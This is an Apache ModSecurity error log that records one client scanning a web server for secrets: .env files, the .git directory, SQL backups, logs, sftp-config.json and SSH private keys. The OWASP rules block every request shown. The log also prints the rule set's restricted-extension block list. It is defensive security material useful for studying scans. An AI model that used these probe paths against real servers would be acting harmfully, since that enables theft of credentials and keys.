[Mon May 11 22:01:49.876572 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:21396] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agI1rdeaRXe5lR8y0ZOs8gAAAUU"]
[Mon May 11 22:01:49.876811 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:21396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.dist"] [unique_id "agI1rdeaRXe5lR8y0ZOs8gAAAUU"]
[Mon May 11 22:01:49.876931 2026] [security2:error] [pid 1588898:tid 1588916] [client 193.111.117.35:21456] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agI1raFW67LJTsgN3jQEXgAAABE"]
[Mon May 11 22:01:49.877140 2026] [security2:error] [pid 1588898:tid 1588916] [client 193.111.117.35:21456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.txt"] [unique_id "agI1raFW67LJTsgN3jQEXgAAABE"]
[Mon May 11 22:01:49.877423 2026] [security2:error] [pid 1534836:tid 1534876] [client 193.111.117.35:21396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rdeaRXe5lR8y0ZOs8gAAAUU"]
[Mon May 11 22:01:49.877920 2026] [security2:error] [pid 1588898:tid 1588916] [client 193.111.117.35:21456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1raFW67LJTsgN3jQEXgAAABE"]
[Mon May 11 22:01:50.252891 2026] [security2:error] [pid 1601130:tid 1601163] [client 193.111.117.35:22074] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/HEAD"] [unique_id "agI1rnEgAO_835W6c1mNoAAAAE0"]
[Mon May 11 22:01:50.253137 2026] [security2:error] [pid 1601130:tid 1601163] [client 193.111.117.35:22074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/HEAD"] [unique_id "agI1rnEgAO_835W6c1mNoAAAAE0"]
[Mon May 11 22:01:50.329681 2026] [security2:error] [pid 1601130:tid 1601163] [client 193.111.117.35:22074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1rnEgAO_835W6c1mNoAAAAE0"]
[Mon May 11 22:01:55.883117 2026] [:error] [pid 1588898:tid 1588914] [client 193.111.117.35:58186] File does not exist: /var/www/html/db_config.php
[Mon May 11 22:01:55.889651 2026] [security2:error] [pid 1534836:tid 1534885] [client 193.111.117.35:58128] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/backup.sql"] [unique_id "agI1s9eaRXe5lR8y0ZOtAgAAAU4"]
[Mon May 11 22:01:55.889888 2026] [security2:error] [pid 1534836:tid 1534885] [client 193.111.117.35:58128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/backup.sql"] [unique_id "agI1s9eaRXe5lR8y0ZOtAgAAAU4"]
[Mon May 11 22:01:55.890126 2026] [security2:error] [pid 1588898:tid 1588911] [client 193.111.117.35:58114] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/app.log"] [unique_id "agI1s6FW67LJTsgN3jQEaAAAAAw"]
[Mon May 11 22:01:55.890383 2026] [security2:error] [pid 1588898:tid 1588911] [client 193.111.117.35:58114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app.log"] [unique_id "agI1s6FW67LJTsgN3jQEaAAAAAw"]
[Mon May 11 22:01:55.890786 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:58098] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/error.log"] [unique_id "agI1s3EgAO_835W6c1mNtAAAAEg"]
[Mon May 11 22:01:55.891004 2026] [security2:error] [pid 1534836:tid 1534885] [client 193.111.117.35:58128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s9eaRXe5lR8y0ZOtAgAAAU4"]
[Mon May 11 22:01:55.891020 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:58098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/error.log"] [unique_id "agI1s3EgAO_835W6c1mNtAAAAEg"]
[Mon May 11 22:01:55.891665 2026] [security2:error] [pid 1601130:tid 1601158] [client 193.111.117.35:58098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s3EgAO_835W6c1mNtAAAAEg"]
[Mon May 11 22:01:55.891731 2026] [security2:error] [pid 1588898:tid 1588911] [client 193.111.117.35:58114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s6FW67LJTsgN3jQEaAAAAAw"]
[Mon May 11 22:01:55.902018 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:58048] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/storage/logs/production.log"] [unique_id "agI1s3EgAO_835W6c1mNtwAAAE8"]
[Mon May 11 22:01:55.902505 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:58048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/storage/logs/production.log"] [unique_id "agI1s3EgAO_835W6c1mNtwAAAE8"]
[Mon May 11 22:01:55.903572 2026] [security2:error] [pid 1601130:tid 1601165] [client 193.111.117.35:58048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s3EgAO_835W6c1mNtwAAAE8"]
[Mon May 11 22:01:55.926525 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:58266] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/sftp-config.json"] [unique_id "agI1s6FW67LJTsgN3jQEbAAAAAQ"]
[Mon May 11 22:01:55.926768 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:58266] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/sftp-config.json"] [unique_id "agI1s6FW67LJTsgN3jQEbAAAAAQ"]
[Mon May 11 22:01:55.970424 2026] [security2:error] [pid 1588898:tid 1588903] [client 193.111.117.35:58266] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s6FW67LJTsgN3jQEbAAAAAQ"]
[Mon May 11 22:01:55.999732 2026] [security2:error] [pid 1534836:tid 1534870] [client 193.111.117.35:58450] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/.ssh/id_dsa.key"] [unique_id "agI1s9eaRXe5lR8y0ZOtDAAAAUA"]
[Mon May 11 22:01:56.000077 2026] [security2:error] [pid 1534836:tid 1534870] [client 193.111.117.35:58450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.ssh/id_dsa.key"] [unique_id "agI1s9eaRXe5lR8y0ZOtDAAAAUA"]
[Mon May 11 22:01:56.000942 2026] [security2:error] [pid 1534836:tid 1534870] [client 193.111.117.35:58450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1s9eaRXe5lR8y0ZOtDAAAAUA"]
[Mon May 11 22:01:56.057309 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:58544] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/.ssh/id_ecdsa.key"] [unique_id "agI1tHEgAO_835W6c1mNvgAAAFA"]
[Mon May 11 22:01:56.057655 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:58544] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.ssh/id_ecdsa.key"] [unique_id "agI1tHEgAO_835W6c1mNvgAAAFA"]
[Mon May 11 22:01:56.058391 2026] [security2:error] [pid 1601130:tid 1601166] [client 193.111.117.35:58544] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tHEgAO_835W6c1mNvgAAAFA"]
[Mon May 11 22:01:56.134403 2026] [security2:error] [pid 1605480:tid 1605523] [client 193.111.117.35:58676] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/.ssh/id_rsa.key"] [unique_id "agI1tB2Cvzd_nyNfUm_2VAAAAQE"]
[Mon May 11 22:01:56.134804 2026] [security2:error] [pid 1605480:tid 1605523] [client 193.111.117.35:58676] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.ssh/id_rsa.key"] [unique_id "agI1tB2Cvzd_nyNfUm_2VAAAAQE"]
[Mon May 11 22:01:56.135656 2026] [security2:error] [pid 1605480:tid 1605523] [client 193.111.117.35:58676] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agI1tB2Cvzd_nyNfUm_2VAAAAQE"]
[Mon May 11 22:01:56.229833 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:58710] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "217.113.192.26"] [uri "/.ssh/identity.key"] [unique_id "agI1tKFW67LJTsgN3jQEcwAAAAk"]
[Mon May 11 22:01:56.230194 2026] [security2:error] [pid 1588898:tid 1588908] [client 193.111.117.35:58710] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.ssh/identity.key"] [unique_id "agI1tKFW67LJTsgN3jQEcwAAAAk"]
